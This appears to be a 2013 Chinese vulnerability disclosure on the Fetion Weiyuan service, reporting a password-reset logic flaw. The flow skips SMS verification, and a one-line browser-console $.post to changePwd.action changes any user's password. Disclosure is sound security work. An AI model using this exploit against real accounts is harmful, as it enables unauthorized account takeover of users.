漏洞概要
关注数(24)
关注此漏洞
漏洞标题:飞信位缘某处设计缺陷可修改任意用户密码(非爆破)
提交时间:2013-09-17 12:16
修复时间:2013-09-22 12:17
公开时间:2013-09-22 12:17
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2013-09-17: 细节已通知厂商并且等待厂商处理中
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
额。。为什么还有3呢。。。。。
详细说明:
注册 登陆 都绕过了 为什么还有三呢
如果是已经注册的用户该怎么弄到他的号呢,找回密码
来看看找回密码的逻辑
直接打开/passport/passport/getpassword1.action?mobile=13622222222
再跟到下一个页面/passport/passport/getpassword2.action
最后提交修改密码的步骤 只提交了手机号和新密码 短验又无视了
漏洞证明:
直接打开http://lbs.feixin.10086.cn//passport/passport/getpassword2.action
其实不打开这个页面都无所谓
f12 console
$.post('/passport/passport/changePwd.action', 'mobile=13622222222&newpassword=a!11111111',function(data){alert(data);});
回车走你
这是成功了吧,拿新密码用上一个绕过短验登陆的exp测试 OK 又进去了
终于完了 不会有四了 这仨漏洞加一块已经秒杀所有用户了
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-09-22 12:17
厂商回复:
最新状态:
暂无